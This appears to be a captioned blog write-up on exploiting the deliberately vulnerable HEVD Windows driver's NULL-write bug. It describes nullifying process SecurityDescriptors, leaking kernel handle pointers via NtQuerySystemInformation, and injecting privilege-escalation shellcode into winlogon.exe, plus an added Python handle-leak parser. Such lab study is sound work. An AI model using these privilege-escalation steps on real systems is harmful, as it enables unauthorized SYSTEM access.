HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

Introduction

[HEVD]-TriggerWriteNull

HEVD - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
The TriggerWriteNULL function, which handles the user-supplied buffer and checks whether it resides in ring3 (user-land).
Source-code of vulnerable driver function
Reversing Engineering vulnerable function
Placing a breakpoints on strategic addresses and running it.
Reading important addresses using WinDBG cmd
Here you can see the vulnerability: ebx=0x00000000 is being written over our value inside the user buffer at eax=0xa16460cc.

DACL & SecurityDescriptor

WinDBG processes list
Getting nt!_OBJECT_HEADER address from System (PID:4) process
Viewing information about System (PID:4) process header
SecurityDescriptor pointing to 0x8c005e1f
Visualizing the SecurityDescriptor struct of the System (PID:4) process
SYSTEM and DAML users (colors compared to last image)
Nullifying the SecurityDescriptor pointer
Results after nullification of the pointer
You may not be able to read it, but it says “Do you want to close the [System] process?”
ERROR: DCOM server process launcher service terminated unexpectedly
WinDBG processes list

NtQuerySystemInformation - Handle Leaking Attack

SYSTEM_HANDLE_TABLE_ENTRY_INFO
SYSTEM_HANDLE_INFORMATION
Piece of code to leak handles data
This part loops over all handles and reads each one's data
Script running and leaking pointers from ring3 (user-land) (PID:444)
Script running and leaking pointers from ring3 (user-land) (PID:1240)
[11931] leaked pointers found
WinDBG processes list
Source-code modified in order to filter only handles from “lsass.exe” PID
Nullifying the SecurityDescriptor of the leaked “lsass.exe” handle pointers, and injecting the “LPE shellcode” into the “winlogon.exe” process.
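The two captions above (“Piece of code to leak handles data” / “This part will loop all handles”) and the later “filter only handles from lsass.exe PID” step describe the same routine: call NtQuerySystemInformation with the SystemHandleInformation class, walk the SYSTEM_HANDLE_INFORMATION array, and keep the entries whose UniqueProcessId matches. The following is an added example and not the author's script; it parses the structure from a constructed buffer (so it runs anywhere) and only touches ntdll when run on Windows. The field layout is the commonly published one (it is not in winternl.h), and the entry size of 16 bytes on x86 / 24 bytes on x64 is an assumption of this example. From a defensive point of view, the Object field is exactly the kernel address leak that Windows 8.1 and later hide from callers below medium integrity, which is why this primitive is only useful from an already-medium-integrity process.

```python
"""Parse SYSTEM_HANDLE_INFORMATION (NtQuerySystemInformation class 16)
and filter the entries by PID.  Example code, not part of the HEVD write-up."""
import ctypes
import struct
import sys

SYSTEM_HANDLE_INFORMATION_CLASS = 16      # SystemHandleInformation
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004

# SYSTEM_HANDLE_TABLE_ENTRY_INFO (assumed, commonly published layout):
#   USHORT UniqueProcessId; USHORT CreatorBackTraceIndex;
#   UCHAR  ObjectTypeIndex; UCHAR  HandleAttributes;
#   USHORT HandleValue;     PVOID  Object;   ULONG GrantedAccess;
# 16 bytes on x86; 24 bytes on x64 because of tail padding.
ENTRY_FMT = {4: "<HHBBHII", 8: "<HHBBHQI4x"}
# SYSTEM_HANDLE_INFORMATION: ULONG NumberOfHandles followed by the
# pointer-aligned entry array (offset 4 on x86, offset 8 on x64).
HEADER_FMT = {4: "<I", 8: "<I4x"}


def parse_handle_information(buf, ptr_size=4):
    """Return one dict per handle entry found in a raw buffer."""
    hdr = struct.Struct(HEADER_FMT[ptr_size])
    ent = struct.Struct(ENTRY_FMT[ptr_size])
    (count,) = hdr.unpack_from(buf, 0)
    entries = []
    for i in range(count):
        pid, backtrace, type_idx, attrs, handle, obj, access = ent.unpack_from(
            buf, hdr.size + i * ent.size)
        entries.append({"pid": pid, "type": type_idx, "attrs": attrs,
                        "handle": handle, "object": obj, "access": access})
    return entries


def handles_for_pid(entries, pid):
    """Keep only the handles owned by one process, as in the lsass.exe filter."""
    return [e for e in entries if e["pid"] == pid]


def build_sample_buffer(rows, ptr_size=4):
    """Constructed test data: rows of (pid, handle, object, access)."""
    ent = struct.Struct(ENTRY_FMT[ptr_size])
    out = struct.pack(HEADER_FMT[ptr_size], len(rows))
    for pid, handle, obj, access in rows:
        out += ent.pack(pid, 0, 7, 0, handle, obj, access)
    return out


def query_handle_information():
    """Live query on Windows: grow the buffer until the kernel accepts its size."""
    if not sys.platform.startswith("win"):
        raise OSError("NtQuerySystemInformation is only available on Windows")
    ntdll = ctypes.WinDLL("ntdll")
    ntdll.NtQuerySystemInformation.restype = ctypes.c_ulong
    size = 0x10000
    while True:
        buf = ctypes.create_string_buffer(size)
        needed = ctypes.c_ulong(0)
        status = ntdll.NtQuerySystemInformation(
            SYSTEM_HANDLE_INFORMATION_CLASS, buf, size, ctypes.byref(needed))
        if status != STATUS_INFO_LENGTH_MISMATCH:
            break
        size = max(needed.value + 0x1000, size * 2)   # handle table keeps changing
    if status != 0:
        raise OSError("NtQuerySystemInformation failed: 0x%08x" % status)
    return parse_handle_information(buf.raw, ctypes.sizeof(ctypes.c_void_p))


# Constructed sample: three handles, two of them owned by PID 4 (System).
SAMPLE_ROWS = [(4, 0x1C, 0x8A1B2C3D, 0x1F0FFF),
               (444, 0x10, 0x8A5E6F70, 0x100000),
               (4, 0x20, 0x8A9F0A10, 0x1FFFFF)]

if __name__ == "__main__":
    entries = parse_handle_information(build_sample_buffer(SAMPLE_ROWS))
    for e in handles_for_pid(entries, 4):
        print("pid=%d handle=0x%x object=0x%08x" % (e["pid"], e["handle"], e["object"]))
    if sys.platform.startswith("win"):
        live = query_handle_information()
        print("[%d] handle entries returned by the kernel" % len(live))
```

The loop in query_handle_information matters in practice: the handle table changes between the size probe and the real call, so a single retry with the exact requested size often fails again with STATUS_INFO_LENGTH_MISMATCH.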

OSCP 18y | OSCE 19y | OSWE 21y | - Security Research Noob — @w4fz5uck5
